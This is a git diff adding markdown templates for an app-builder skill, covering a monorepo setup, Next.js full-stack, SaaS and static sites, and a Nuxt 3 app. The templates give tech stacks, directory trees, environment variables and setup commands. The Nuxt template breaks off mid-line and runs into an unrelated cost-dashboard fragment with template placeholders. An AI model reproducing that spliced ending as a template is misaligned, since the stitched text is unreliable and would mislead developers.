+| dev | cache: false, persistent |
+| lint | ^build |
+| test | ^build |
+
+---
+
+## Setup Steps
+
+1. Create root directory
+2. `pnpm init`
+3. Create pnpm-workspace.yaml
+4. Create turbo.json
+5. Add apps and packages
+6. `pnpm install`
+7. `pnpm dev`
+
+---
+
+## Common Commands
+
+| Command | Description |
+|---------|-------------|
+| `pnpm dev` | Run all apps |
+| `pnpm build` | Build all |
+| `pnpm --filter @name/web dev` | Run specific app |
+| `pnpm --filter @name/web add axios` | Add dep to app |
+
+---
+
+## Best Practices
+
+- Shared configs in packages/config
+- Shared types in packages/types
+- Internal packages with `workspace:*`
+- Use Turbo remote caching for CI
diff --git a/web-app/public/skills/app-builder/templates/nextjs-fullstack/TEMPLATE.md b/web-app/public/skills/app-builder/templates/nextjs-fullstack/TEMPLATE.md
new file mode 100644
index 00000000..b86a930b
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/nextjs-fullstack/TEMPLATE.md
@@ -0,0 +1,82 @@
+---
+name: nextjs-fullstack
+description: Next.js full-stack template principles. App Router, Prisma, Tailwind.
+---
+
+# Next.js Full-Stack Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Next.js 14 (App Router) |
+| Language | TypeScript |
+| Database | PostgreSQL + Prisma |
+| Styling | Tailwind CSS |
+| Auth | Clerk (optional) |
+| Validation | Zod |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── prisma/
+│ └── schema.prisma
+├── src/
+│ ├── app/
+│ │ ├── layout.tsx
+│ │ ├── page.tsx
+│ │ ├── globals.css
+│ │ └── api/
+│ ├── components/
+│ │ └── ui/
+│ ├── lib/
+│ │ ├── db.ts # Prisma client
+│ │ └── utils.ts
+│ └── types/
+├── .env.example
+└── package.json
+```
+
+---
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Server Components | Default, fetch data |
+| Server Actions | Form mutations |
+| Route Handlers | API endpoints |
+| Prisma | Type-safe ORM |
+
+---
+
+## Environment Variables
+
+| Variable | Purpose |
+|----------|---------|
+| DATABASE_URL | Prisma connection |
+| NEXT_PUBLIC_APP_URL | Public URL |
+
+---
+
+## Setup Steps
+
+1. `npx create-next-app {{name}} --typescript --tailwind --app`
+2. `npm install prisma @prisma/client zod`
+3. `npx prisma init`
+4. Configure schema
+5. `npm run db:push`
+6. `npm run dev`
+
+---
+
+## Best Practices
+
+- Server Components by default
+- Server Actions for mutations
+- Prisma for type-safe DB
+- Zod for validation
+- Edge runtime where possible
diff --git a/web-app/public/skills/app-builder/templates/nextjs-saas/TEMPLATE.md b/web-app/public/skills/app-builder/templates/nextjs-saas/TEMPLATE.md
new file mode 100644
index 00000000..eb4e0986
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/nextjs-saas/TEMPLATE.md
@@ -0,0 +1,100 @@
+---
+name: nextjs-saas
+description: Next.js SaaS template principles. Auth, payments, email.
+---
+
+# Next.js SaaS Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Next.js 14 (App Router) |
+| Auth | NextAuth.js v5 |
+| Payments | Stripe |
+| Database | PostgreSQL + Prisma |
+| Email | Resend |
+| UI | Tailwind (ASK USER: shadcn/Headless UI/Custom?) |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── prisma/
+├── src/
+│ ├── app/
+│ │ ├── (auth)/ # Login, register
+│ │ ├── (dashboard)/ # Protected routes
+│ │ ├── (marketing)/ # Landing, pricing
+│ │ └── api/
+│ │ ├── auth/[...nextauth]/
+│ │ └── webhooks/stripe/
+│ ├── components/
+│ │ ├── auth/
+│ │ ├── billing/
+│ │ └── dashboard/
+│ ├── lib/
+│ │ ├── auth.ts # NextAuth config
+│ │ ├── stripe.ts # Stripe client
+│ │ └── email.ts # Resend client
+│ └── config/
+│ └── subscriptions.ts
+└── package.json
+```
+
+---
+
+## SaaS Features
+
+| Feature | Implementation |
+|---------|---------------|
+| Auth | NextAuth + OAuth |
+| Subscriptions | Stripe Checkout |
+| Billing Portal | Stripe Portal |
+| Webhooks | Stripe events |
+| Email | Transactional via Resend |
+
+---
+
+## Database Schema
+
+| Model | Fields |
+|-------|--------|
+| User | id, email, stripeCustomerId, subscriptionId |
+| Account | OAuth provider data |
+| Session | User sessions |
+
+---
+
+## Environment Variables
+
+| Variable | Purpose |
+|----------|---------|
+| DATABASE_URL | Prisma |
+| NEXTAUTH_SECRET | Auth |
+| STRIPE_SECRET_KEY | Payments |
+| STRIPE_WEBHOOK_SECRET | Webhooks |
+| RESEND_API_KEY | Email |
+
+---
+
+## Setup Steps
+
+1. `npx create-next-app {{name}} --typescript --tailwind --app`
+2. Install: `npm install next-auth @auth/prisma-adapter stripe resend`
+3. Setup Stripe products/prices
+4. Configure environment
+5. `npm run db:push`
+6. `npm run stripe:listen` (webhooks)
+7. `npm run dev`
+
+---
+
+## Best Practices
+
+- Route groups for layout separation
+- Stripe webhooks for subscription sync
+- NextAuth with Prisma adapter
+- Email templates with React Email
diff --git a/web-app/public/skills/app-builder/templates/nextjs-static/TEMPLATE.md b/web-app/public/skills/app-builder/templates/nextjs-static/TEMPLATE.md
new file mode 100644
index 00000000..4c7d1a3f
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/nextjs-static/TEMPLATE.md
@@ -0,0 +1,106 @@
+---
+name: nextjs-static
+description: Next.js static site template principles. Landing pages, portfolios, marketing.
+---
+
+# Next.js Static Site Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Next.js 14 (Static Export) |
+| Language | TypeScript |
+| Styling | Tailwind CSS |
+| Animations | Framer Motion |
+| Icons | Lucide React |
+| SEO | Next SEO |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── src/
+│ ├── app/
+│ │ ├── layout.tsx
+│ │ ├── page.tsx # Landing
+│ │ ├── about/
+│ │ ├── contact/
+│ │ └── blog/
+│ ├── components/
+│ │ ├── layout/ # Header, Footer
+│ │ ├── sections/ # Hero, Features, CTA
+│ │ └── ui/
+│ └── lib/
+├── content/ # Markdown content
+├── public/
+└── next.config.js
+```
+
+---
+
+## Static Export Config
+
+```javascript
+// next.config.js
+const nextConfig = {
+ output: 'export',
+ images: { unoptimized: true },
+ trailingSlash: true,
+};
+```
+
+---
+
+## Landing Page Sections
+
+| Section | Purpose |
+|---------|---------|
+| Hero | Main headline, CTA |
+| Features | Product benefits |
+| Testimonials | Social proof |
+| Pricing | Plans |
+| CTA | Final conversion |
+
+---
+
+## Animation Patterns
+
+| Pattern | Use |
+|---------|-----|
+| Fade up | Content entry |
+| Stagger | List items |
+| Scroll reveal | On viewport |
+| Hover | Interactive feedback |
+
+---
+
+## Setup Steps
+
+1. `npx create-next-app {{name}} --typescript --tailwind --app`
+2. Install: `npm install framer-motion lucide-react next-seo`
+3. Configure static export
+4. Create sections
+5. `npm run dev`
+
+---
+
+## Deployment
+
+| Platform | Method |
+|----------|--------|
+| Vercel | Auto |
+| Netlify | Auto |
+| GitHub Pages | gh-pages branch |
+| Any host | Upload `out` folder |
+
+---
+
+## Best Practices
+
+- Static export for maximum performance
+- Framer Motion for premium animations
+- Responsive mobile-first design
+- SEO metadata on every page
diff --git a/web-app/public/skills/app-builder/templates/nuxt-app/TEMPLATE.md b/web-app/public/skills/app-builder/templates/nuxt-app/TEMPLATE.md
new file mode 100644
index 00000000..ceecafe2
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/nuxt-app/TEMPLATE.md
@@ -0,0 +1,101 @@
+---
+name: nuxt-app
+description: Nuxt 3 full-stack template. Vue 3, Pinia, Tailwind, Prisma.
+---
+
+# Nuxt 3 Full-Stack Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Nuxt 3 |
+| Language | TypeScript |
+| UI | Vue 3 (Composition API) |
+| State | Pinia |
+| Database | PostgreSQL + Prisma |
+| Styling | Tailwind CSS |
+| Validation | Zod |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── prisma/
+│ └── schema.prisma
+├── server/
+│ ├── api/
+│ │ └── [resource]/
+│ │ └── index.ts
+│ └── utils/
+│ └── db.ts # Prisma client
+├── composables/
+│ └── useAuth.ts
+├── stores/
+│ └── user.ts # Pinia store
+├── components/
+│ └── ui/
+├── pages/
+│ ├── index.vue
+│ └── [...slug].vue
+├── layouts/
+│ └── default.vue
+├── assets/
+│ └── css/
+│ └── main.css
+├── .env.example
+├── nuxt.config.ts
+└── package.json
+```
+
+---
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Auto-imports | Components, composables, utils |
+| File-based routing | pages/ → routes |
+| Server Routes | server/api/ → API endpoints |
+| Composables | Reusable reactive logic |
+| Pinia | State management |
+
+---
+
+## Environment Variables
+
+| Variable | Purpose |
+|----------|---------|
+| DATABASE_URL | Prisma connection |
+| NUXT_PUBLIC_APP_URL | Public URL |
+
+---
+
+## Setup Steps
+
+1. `npx nuxi@latest init {{name}}`
+2. `cd {{name}}`
+3. `npm install @pinia/nuxt @prisma/client prisma zod`
+4. `npm install -D @nuxtjs/tailwindcss`
+5. Add modules to `nuxt.config.ts`:
+ ```ts
+ modules: ['@pinia/nuxt', '@nuxtjs/tailwindcss']
+ ```
+6. `npx prisma init`
+7. Configure schema
+8. `npx prisma db push`
+9. `npm run dev`
+
+---
+
+## Best Practices
+
+- Use `
+
+
+
+
+
+
Current Coverage
+
{coverage_percentage}%
+
On-Demand: ${on_demand_cost}
+
Reserved: ${reserved_cost}
+
+
+
+
Potential Savings
+
${potential_savings}/month
+
{recommendations_count} opportunities
+
+
+
+
Expiring Soon
+
{expiring_count} RIs
+
Next 30 days
+
+
+
+
+
+
+
+
+
+
Top Recommendations
+
+
+ Type
+ Resource
+ Term
+ Upfront
+ Monthly Savings
+ ROI
+ Action
+
+ {recommendation_rows}
+
+
+
+
+